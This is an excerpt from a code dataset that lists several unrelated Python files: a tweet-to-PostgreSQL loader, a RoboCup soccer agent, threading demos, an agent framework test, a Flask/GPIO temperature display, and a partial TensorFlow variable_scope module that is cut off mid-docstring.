source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
multithread_controller.py
|
import argparse
import multiprocessing
import os
import time
import psycopg2
import worker
import consts
lock = multiprocessing.Lock()
class Controller:
def __init__(self, archive_path, words):
self._archive_path = archive_path
self._words = words
self._task_size = 4
self._n_files_done = multiprocessing.Value('i', 0)
self._total_files = 0
for _, _, files in os.walk(self._archive_path):
for file in files:
if file.endswith("bz2"):
self._total_files += 1
def _worker(self, task_queue, lock):
DBworker = worker.Worker(self._words, lock)
while not task_queue.empty():
crt_task = task_queue.get()
DBworker.json_to_db(crt_task)
with self._n_files_done.get_lock():
self._n_files_done.value += self._task_size
if self._n_files_done.value < self._total_files:
print("Files done: " + str(self._n_files_done.value) +
" out of " + str(self._total_files),
end='\r')
else:
print("Files done: " + str(self._n_files_done.value) +
" out of " + str(self._total_files),
end='\n')
DBworker.finalise()
def _populate_tasks(self, task_queue):
all_files = []
for root, dirs, files in os.walk(self._archive_path):
for file in files:
if file.endswith("bz2"):
all_files.append(os.path.join(root, file))
for idx in range(0, len(all_files), self._task_size):
task_queue.put(all_files[idx:idx + self._task_size])
return task_queue
@staticmethod
def _setup_database():
try:
# Establish connection
connection = psycopg2.connect(**consts.db_creds)
# Create tweets table
drop_first = '''DROP TABLE IF EXISTS tweets'''
cursor = connection.cursor()
cursor.execute(drop_first)
create_table_query = ''' CREATE TABLE tweets
(ID SERIAL PRIMARY KEY,
created_at TIMESTAMP NOT NULL,
text TEXT NOT NULL,
usr VARCHAR (255) NOT NULL,
twid VARCHAR (255) NOT NULL,
md5_hash VARCHAR (255) NOT NULL,
rt_status BOOLEAN NOT NULL,
screen_name VARCHAR(55) NOT NULL,
retweet_text TEXT);
'''
index_query = "CREATE INDEX create_at_index ON tweets (created_at);"
cursor.execute(create_table_query)
cursor.execute(index_query)
except psycopg2.Error as error:
print("Error while connecting to PostgreSQL", error)
finally:
# Batch commit all changes
connection.commit()
# Close connection
if connection:
cursor.close()
connection.close()
@staticmethod
def _create_indexes():
try:
# Establish connection
connection = psycopg2.connect(**consts.db_creds)
cursor = connection.cursor()
text_index = ''' CREATE INDEX text_index ON tweets
USING hash (text); '''
cursor.execute(text_index)
except psycopg2.Error as error:
print("Error while connecting to PostgreSQL", error)
finally:
# Batch commit all changes
connection.commit()
# Close connection
if connection:
cursor.close()
connection.close()
def run(self):
self._setup_database()
empty_task_queue = multiprocessing.Queue()
full_task_queue = self._populate_tasks(empty_task_queue)
processes = []
n_processes = multiprocessing.cpu_count()
print(f'Running with {n_processes} processes!')
start = time.time()
for w in range(n_processes):
p = multiprocessing.Process(
target=self._worker, args=(full_task_queue, lock))
processes.append(p)
p.start()
for p in processes:
p.join()
print('Creating indexes')
self._create_indexes()
print(f'Time taken = {time.time() - start:.10f}')
for p in processes:
p.close()
def main():
parser = argparse.ArgumentParser(description='Create DB from tweets')
parser.add_argument('-a', help='Path to the archive')
parser.add_argument('words', metavar='W', type=str, nargs='*',
help='Words used for filtering')
args = parser.parse_args()
path = args.a
words = args.words
if words is None:
words = []
runner = Controller(path, words)
print("Started job")
runner.run()
print("\nFinished job")
if __name__ == "__main__":
main()
|
agent.py
|
#!/usr/bin/env python
import threading
import time
import random
import sock
import sp_exceptions
import handler
from world_model import WorldModel
class Agent:
def __init__(self):
# whether we're connected to a server yet or not
self.__connected = False
# set all variables and important objects to appropriate values for
# pre-connect state.
# the socket used to communicate with the server
self.__sock = None
# models and the message handler for parsing and storing information
self.wm = None
self.msg_handler = None
# parse thread and control variable
self.__parsing = False
self.__msg_thread = None
self.__thinking = False # think thread and control variable
self.__think_thread = None
# whether we should run the think method
self.__should_think_on_data = False
# whether we should send commands
self.__send_commands = False
#proprio gol
self.goal_pos = None
def connect(self, host, port, teamname, version=11):
"""
Gives us a connection to the server as one player on a team. This
immediately connects the agent to the server and starts receiving and
parsing the information it sends.
"""
# if already connected, raise an error since user may have wanted to
# connect again to a different server.
if self.__connected:
msg = "Cannot connect while already connected, disconnect first."
raise sp_exceptions.AgentConnectionStateError(msg)
# the pipe through which all of our communication takes place
self.__sock = sock.Socket(host, port)
# our models of the world and our body
self.wm = WorldModel(handler.ActionHandler(self.__sock))
# set the team name of the world model to the given name
self.wm.teamname = teamname
# handles all messages received from the server
self.msg_handler = handler.MessageHandler(self.wm)
# set up our threaded message receiving system
self.__parsing = True # tell thread that we're currently running
self.__msg_thread = threading.Thread(target=self.__message_loop,
name="message_loop")
self.__msg_thread.daemon = True # dies when parent thread dies
# start processing received messages. this will catch the initial server
# response and all subsequent communication.
self.__msg_thread.start()
# send the init message and allow the message handler to handle further
# responses.
init_address = self.__sock.address
init_msg = "(init %s (version %d))"
self.__sock.send(init_msg % (teamname, version))
# wait until the socket receives a response from the server and gets its
# assigned port.
while self.__sock.address == init_address:
time.sleep(0.0001)
# create our thinking thread. this will perform the actions necessary
# to play a game of robo-soccer.
self.__thinking = False
self.__think_thread = threading.Thread(target=self.__think_loop,
name="think_loop")
self.__think_thread.daemon = True
# set connected state. done last to prevent state inconsistency if
# something goes wrong beforehand.
self.__connected = True
def play(self):
"""
Kicks off the thread that does the agent's thinking, allowing it to play
during the game. Throws an exception if called while the agent is
already playing.
"""
# ensure we're connected before doing anything
if not self.__connected:
msg = "Must be connected to a server to begin play."
raise sp_exceptions.AgentConnectionStateError(msg)
# throw exception if called while thread is already running
if self.__thinking:
raise sp_exceptions.AgentAlreadyPlayingError(
"Agent is already playing.")
# run the method that sets up the agent's persistant variables
self.setup_environment()
# tell the thread that it should be running, then start it
self.__thinking = True
self.__should_think_on_data = True
self.__think_thread.start()
def disconnect(self):
"""
Tell the loop threads to stop and signal the server that we're
disconnecting, then join the loop threads and destroy all our inner
methods.
Since the message loop thread can conceiveably block indefinitely while
waiting for the server to respond, we only allow it (and the think loop
for good measure) a short time to finish before simply giving up.
Once an agent has been disconnected, it is 'dead' and cannot be used
again. All of its methods get replaced by a method that raises an
exception every time it is called.
"""
# don't do anything if not connected
if not self.__connected:
return
# tell the loops to terminate
self.__parsing = False
self.__thinking = False
# tell the server that we're quitting
self.__sock.send("(bye)")
# tell our threads to join, but only wait breifly for them to do so.
# don't join them if they haven't been started (this can happen if
# disconnect is called very quickly after connect).
if self.__msg_thread.is_alive():
self.__msg_thread.join(0.01)
if self.__think_thread.is_alive():
self.__think_thread.join(0.01)
# reset all standard variables in this object. self.__connected gets
# reset here, along with all other non-user defined internal variables.
Agent.__init__(self)
def __message_loop(self):
"""
Handles messages received from the server.
This SHOULD NOT be called externally, since it's used as a threaded loop
internally by this object. Calling it externally is a BAD THING!
"""
# loop until we're told to stop
while self.__parsing:
# receive message data from the server and pass it along to the
# world model as-is. the world model parses it and stores it within
# itself for perusal at our leisure.
raw_msg = self.__sock.recv()
msg_type = self.msg_handler.handle_message(raw_msg)
# we send commands all at once every cycle, ie. whenever a
# 'sense_body' command is received
if msg_type == handler.ActionHandler.CommandType.SENSE_BODY:
self.__send_commands = True
# flag new data as needing the think loop's attention
self.__should_think_on_data = True
def __think_loop(self):
"""
Performs world model analysis and sends appropriate commands to the
server to allow the agent to participate in the current game.
Like the message loop, this SHOULD NOT be called externally. Use the
play method to start play, and the disconnect method to end it.
"""
while self.__thinking:
# tell the ActionHandler to send its enqueued messages if it is time
if self.__send_commands:
self.__send_commands = False
self.wm.ah.send_commands()
# only think if new data has arrived
if self.__should_think_on_data:
# flag that data has been processed. this shouldn't be a race
# condition, since the only change would be to make it True
# before changing it to False again, and we're already going to
# process data, so it doesn't make any difference.
self.__should_think_on_data = False
# performs the actions necessary for the agent to play soccer
self.think()
else:
# prevent from burning up all the cpu time while waiting for data
time.sleep(0.0001)
def setup_environment(self):
"""
Called before the think loop starts, this allows the user to store any
variables/objects they'll want access to across subsequent calls to the
think method.
"""
self.in_kick_off_formation = False
def player1(self):
#play
# determine the enemy goal position
goal_pos = None
goal_pos = (-55, 0) if self.wm.side == WorldModel.SIDE_R else (55, 0)
self.wm.ah.dash(50)
self.wm.turn_body_to_point(goal_pos)
self.wm.ah.dash(50)
def player2(self):
#play
xxxx = 1
def player3(self):
#play
xxxx = 0
def player4(self):
#play
xxxx = 0
def player5(self):
#play
xxxx = 0
def player6(self):
#play
xxxx = 0
def player7(self):
#play
xxxx = 0
def player8(self):
#play
xxxx = 0
def player9(self):
#play atacante
#determinando o gol inimigo
enemy_goal_pos = None
enemy_goal_pos = (55, 0) if self.wm.side != WorldModel.SIDE_R else (-55, 0)
# find the ball
if self.wm.ball is None or self.wm.ball.direction is None:
self.wm.ah.turn(30)
return
# kick it at the enemy goal
if self.wm.is_ball_kickable():
self.wm.turn_body_to_point(enemy_goal_pos)
self.wm.align_neck_with_body()
self.wm.kick_to(enemy_goal_pos, 1.0)
return
else:
# move towards ball
if -7 <= self.wm.ball.direction <= 7:
self.wm.ah.dash(65)
else:
# face ball
self.wm.ah.turn(self.wm.ball.direction / 2)
return
def player10(self):
self.player9()
def player11(self):
self.player9()
def think(self):
"""
Performs a single step of thinking for our agent. Gets called on every
iteration of our think loop.
"""
# DEBUG: tells us if a thread dies
if not self.__think_thread.is_alive() or not self.__msg_thread.is_alive():
raise Exception("A thread died.")
# take places on the field by uniform number
if not self.in_kick_off_formation:
# used to flip x coords for other side
side_mod = 1
#if self.wm.side == WorldModel.SIDE_R:
# side_mod = 1
if self.wm.uniform_number == 1:
self.wm.teleport_to_point((-50 * side_mod, 0))
elif self.wm.uniform_number == 2:
self.wm.teleport_to_point((-40 * side_mod, 15))
elif self.wm.uniform_number == 3:
self.wm.teleport_to_point((-40 * side_mod, 00))
elif self.wm.uniform_number == 4:
self.wm.teleport_to_point((-40 * side_mod, -15))
elif self.wm.uniform_number == 5:
self.wm.teleport_to_point((-5 * side_mod, -30))
elif self.wm.uniform_number == 6:
self.wm.teleport_to_point((-20 * side_mod, 20))
elif self.wm.uniform_number == 7:
self.wm.teleport_to_point((-20 * side_mod, 0))
elif self.wm.uniform_number == 8:
self.wm.teleport_to_point((-20 * side_mod, -20))
elif self.wm.uniform_number == 9:
self.wm.teleport_to_point((-19 * side_mod, 0))
elif self.wm.uniform_number == 10:
self.wm.teleport_to_point((-19 * side_mod, 10))
elif self.wm.uniform_number == 11:
self.wm.teleport_to_point((-19 * side_mod, -10))
self.in_kick_off_formation = True
return
# determine the enemy goal position
if self.wm.uniform_number == 1:
self.player1()
elif self.wm.uniform_number == 2:
self.player2()
elif self.wm.uniform_number == 3:
self.player3()
elif self.wm.uniform_number == 4:
self.player4()
elif self.wm.uniform_number == 5:
self.player5()
elif self.wm.uniform_number == 6:
self.player6()
elif self.wm.uniform_number == 7:
self.player7()
elif self.wm.uniform_number == 8:
self.player8()
elif self.wm.uniform_number == 9:
self.player9()
elif self.wm.uniform_number == 10:
self.player10()
elif self.wm.uniform_number == 11:
self.player11()
"""
# kick off!
if self.wm.is_before_kick_off():
# player 9 takes the kick off
if self.wm.uniform_number == 9:
if self.wm.is_ball_kickable():
# kick with 100% extra effort at enemy goal
self.wm.kick_to(goal_pos, 1.0)
else:
# move towards ball
if self.wm.ball is not None:
if (self.wm.ball.direction is not None and
-7 <= self.wm.ball.direction <= 7):
self.wm.ah.dash(50)
else:
self.wm.turn_body_to_point((0, 0))
# turn to ball if we can see it, else face the enemy goal
if self.wm.ball is not None:
self.wm.turn_neck_to_object(self.wm.ball)
return
# attack!
else:
# find the ball
if self.wm.ball is None or self.wm.ball.direction is None:
self.wm.ah.turn(30)
return
# kick it at the enemy goal
if self.wm.is_ball_kickable():
self.wm.kick_to(goal_pos, 1.0)
return
else:
# move towards ball
if -7 <= self.wm.ball.direction <= 7:
self.wm.ah.dash(65)
else:
# face ball
self.wm.ah.turn(self.wm.ball.direction / 2)
return
"""
if __name__ == "__main__":
import sys
import multiprocessing as mp
# enforce corrent number of arguments, print help otherwise
if len(sys.argv) < 3:
print "args: ./agent.py <team_name> <num_players>"
sys.exit()
def spawn_agent(team_name):
"""
Used to run an agent in a seperate physical process.
"""
a = Agent()
a.connect("localhost", 6000, team_name)
a.play()
# we wait until we're killed
while 1:
# we sleep for a good while since we can only exit if terminated.
time.sleep(1)
# spawn all agents as seperate processes for maximum processing efficiency
agentthreads = []
for agent in xrange(min(11, int(sys.argv[2]))):
print " Spawning agent %d..." % agent
at = mp.Process(target=spawn_agent, args=(sys.argv[1],))
at.daemon = True
at.start()
agentthreads.append(at)
print "Spawned %d agents." % len(agentthreads)
print
print "Playing soccer..."
# wait until killed to terminate agent processes
try:
while 1:
time.sleep(0.05)
except KeyboardInterrupt:
print
print "Killing agent threads..."
# terminate all agent processes
count = 0
for at in agentthreads:
print " Terminating agent %d..." % count
at.terminate()
count += 1
print "Killed %d agent threads." % (count - 1)
print
print "Exiting."
sys.exit()
|
threading_user.py
|
#!/usr/bin/env python
import threading
import time
import logging
def config_log():
numeric_level = getattr(logging, 'INFO', None) # TODO: Li Wei(cmd line support)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level')
logging.basicConfig(filename='water_army.log', level=numeric_level,
filemode='w', format=('%(asctime)s: '
'%(levelname)s: '
'%(module)s: '
'%(funcName)s(): '
'%(lineno)d:\t '
'%(message)s:'))
def test_Timer():
def hello():
print 'hello'
def world():
print 'world'
t = threading.Timer(1, hello)
t.start()
t = threading.Timer(1, world)
t.start()
def test_Thread_Object():
class tobj(object):
def __call__(self, msg, debug_info):
print msg
print debug_info
def tfun(msg, debug_info):
print threading.currentThread().name, 'Starting'
print msg
print debug_info
print threading.currentThread().name, 'End'
class MyThread(threading.Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs={}, verbose=None):
#super(MyThread,self).__init__(name=name, group=group, target=target, name=name)
super(MyThread,self).__init__()
self.args = args
self.kwargs = kwargs
self.target= target
self.args = args
self.kwargs = kwargs
self.name = name
def run(self):
self.target(self.args, self.kwargs)
print 'runrun'
return
t = threading.Thread(target=tobj(), name='thread--1', args=('hello world',), kwargs={'debug_info':'hahaa',})
t.setDaemon(True)
t.start()
t.join()
t = threading.Thread(target=tfun, name='thread--2', args=('hello world',), kwargs={'debug_info':'hahaa',})
t.setDaemon(True)
t.start()
t.join()
t = MyThread(target=tfun, name='thread--3', args=('hello world',), kwargs={'debug_info':'hahaa',})
t.setDaemon(True)
t.start()
t.join()
def tfun1():
time.sleep(2)
logging.info('%s' % threading.currentThread().name)
print threading.currentThread().name
logging.info('%s' % 'exit tfun1')
print 'exit tfun1'
def tfun2():
print threading.currentThread().name
print 'Exiting tfun2'
def test_Daemon_Thread():
t = threading.Thread(name='daemon thread 1', target=tfun1)
t.setDaemon(True)
print 'We will start daemon thread 1, but it may not finish executing before main thread finish,\
notice that daemon thread is still alive'
t.start()
t = threading.Thread(name='daemon thread 2', target=tfun2)
t.setDaemon(True)
print 'We will start daemon thread 2, main thread will be blocked to finish it'
t.start()
t.join()
def test_Event():
def wait_for_event(e):
print 'wait for event starting'
event_is_set = e.wait()
print 'event set: %s' % event_is_set
def wait_for_event_timeout(e, t):
while not e.isSet():
print 'wait for event timeout starting'
event_is_set = e.wait(t)
print 'event set: %s' % event_is_set
if event_is_set:
print 'processing event'
else:
print 'doing other work'
e = threading.Event()
t1 = threading.Thread(name='block',
target=wait_for_event, args=(e,))
t1.start()
t2 = threading.Thread(name='non-block',
target=wait_for_event_timeout, args=(e,2))
t2.setDaemon(True)
t2.start()
print 'waiting before calling event.set()'
time.sleep(4)
e.set()
print 'Event is set'
t2.join()
def test_Lock():
print 'See: http://www.doughellmann.com/PyMOTW/threading/'
def test_RLock():
lock = threading.Lock()
try:
print 'First try: ', lock.acquire()
print 'Second try: ', lock.acquire(0)
except Exception as inst:
print inst
lock = threading.RLock()
try:
print 'First try: ', lock.acquire()
print 'Second try: ', lock.acquire(False)
print 'Third try: ', lock.acquire(False)
except Exception as inst:
print inst
def loopfunc():
time.sleep(2)
print "hello world"
def test_Thread1():
t = threading.Thread(name='thread', target=loopfunc)
t.setDaemon(True)
t.start()
t.join()
print 'haha'
def test_thread_exception():
def call_exception_thread():
def tfun1():
a = 1
assert a != 1, 'a equals 1'
def tfun():
print 'tfun'
tfun1()
t = threading.Thread(name='thread', target=tfun)
t.start()
t.join()
try:
print 'Note that one thread can\'t catch exception throwed by other thread'
call_exception_thread()
except AssertionError as inst:
print inst
#test_thread_exception()
test_Thread1()
#test_Thread_Object()
#config_log()
#test_Daemon_Thread()
#test_Event()
#test_RLock()
|
test_agent.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests of the agent module."""
import time
from threading import Thread
from aea.agent import Agent, AgentState, Identity
from aea.configurations.base import PublicId
from aea.mail.base import InBox, OutBox
from packages.fetchai.connections.local.connection import LocalNode, OEFLocalConnection
class DummyAgent(Agent):
"""A dummy agent for testing."""
def __init__(self, *args, **kwargs):
"""Initialize the agent."""
super().__init__(*args, **kwargs)
def setup(self) -> None:
"""Set up the agent."""
pass
def act(self) -> None:
"""Act."""
pass
def react(self) -> None:
"""React to events."""
pass
def update(self) -> None:
"""Update the state of the agent."""
pass
def teardown(self) -> None:
"""Tear down the agent."""
pass
def test_run_agent():
"""Test that we can set up and then run the agent."""
with LocalNode() as node:
agent_name = "dummyagent"
agent_address = "some_address"
identity = Identity(agent_name, address=agent_address)
agent = DummyAgent(
identity,
[
OEFLocalConnection(
"mypbk", node, connection_id=PublicId("fetchai", "oef", "0.1.0")
)
],
)
assert agent.name == identity.name
assert (
agent.agent_state == AgentState.INITIATED
), "Agent state must be 'initiated'"
agent.multiplexer.connect()
assert (
agent.agent_state == AgentState.CONNECTED
), "Agent state must be 'connected'"
assert isinstance(agent.inbox, InBox)
assert isinstance(agent.outbox, OutBox)
agent_thread = Thread(target=agent.start)
agent_thread.start()
time.sleep(1.0)
try:
assert (
agent.agent_state == AgentState.RUNNING
), "Agent state must be 'running'"
finally:
agent.stop()
agent.multiplexer.disconnect()
agent_thread.join()
|
serialInput.py
|
#!/usr/bin/env python
from __future__ import print_function # In python 2.7
import sys
import serial
from flask import Flask, render_template
import time
from gpiozero import LED
import threading
app = Flask("appmain")
temp = 0
isCel = 0
isAlarm = 0
@app.route("/")
def appmain():
global temp
global isCel
global isAlarm
alarmFlag = 'ALARM: OFF'
if int(isAlarm) != 0:
alarmFlag = 'ALARM: ON'
if int(isCel) == 0:
if int(isAlarm) != 0 and temp > 25:
alarmFlag = 'ALARM: SOUNDING'
return render_template('alarm.html')
return render_template('index.html', var1 = temp, var2 = 'C', var3 = alarmFlag)
else:
if int(isAlarm) != 0 and temp > 77:
alarmFlag = 'ALARM: SOUNDING'
return render_template('alarm.html')
return render_template('index.html', var1 = temp, var2 = 'F', var3 = alarmFlag)
def serial_start(ser):
gpioPinsFirstNumber = [LED(x) for x in [5,6,13,19]]
secondPins = [LED(x) for x in [4,17,27,22]]
i = 0
while i < 100:
i += 1
global temp
global isCel
global isAlarm
isCel = ser.readline()
isAlarm = ser.readline()
temp = int(int(ser.readline()) * 0.2 + 8)
if int(isCel) == 0:
temp = int((temp - 32) // 1.8)
firstDigit = temp // 10
secondDigit = temp % 10
for pin in gpioPinsFirstNumber:
pin.on()
for pin in secondPins:
pin.on()
if firstDigit == 9:
gpioPinsFirstNumber[1].off()
gpioPinsFirstNumber[2].off()
elif firstDigit == 8:
gpioPinsFirstNumber[1].off()
gpioPinsFirstNumber[2].off()
gpioPinsFirstNumber[3].off()
elif firstDigit == 7:
gpioPinsFirstNumber[0].off()
elif firstDigit == 6:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[3].off()
elif firstDigit == 5:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[2].off()
elif firstDigit == 4:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[2].off()
gpioPinsFirstNumber[3].off()
elif firstDigit == 3:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[1].off()
elif firstDigit == 2:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[1].off()
gpioPinsFirstNumber[3].off()
elif firstDigit == 1:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[1].off()
gpioPinsFirstNumber[2].off()
else:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[1].off()
gpioPinsFirstNumber[2].off()
gpioPinsFirstNumber[3].off()
if secondDigit == 9:
secondPins[1].off()
secondPins[2].off()
elif secondDigit == 8:
secondPins[1].off()
secondPins[2].off()
secondPins[3].off()
elif secondDigit == 7:
secondPins[0].off()
elif secondDigit == 6:
secondPins[0].off()
secondPins[3].off()
elif secondDigit == 5:
secondPins[0].off()
secondPins[2].off()
elif secondDigit == 4:
secondPins[0].off()
secondPins[2].off()
secondPins[3].off()
elif secondDigit == 3:
secondPins[0].off()
secondPins[1].off()
elif secondDigit == 2:
secondPins[0].off()
secondPins[1].off()
secondPins[3].off()
elif secondDigit == 1:
secondPins[0].off()
secondPins[1].off()
secondPins[2].off()
else:
secondPins[0].off()
secondPins[1].off()
secondPins[2].off()
secondPins[3].off()
time.sleep(1.5)
if __name__ == "__main__" :
ser = serial.Serial("/dev/ttyUSB1", 9600, timeout=2)
thread = threading.Thread(target = serial_start, args = (ser, ) )
thread.start()
app.run(debug=True, host='0.0.0.0')
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
class _PartitionInfo(object):
"""Holds partition info used by initializer functions.
"""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape
of the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(
shape), self.full_shape, len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = False
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys
and the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
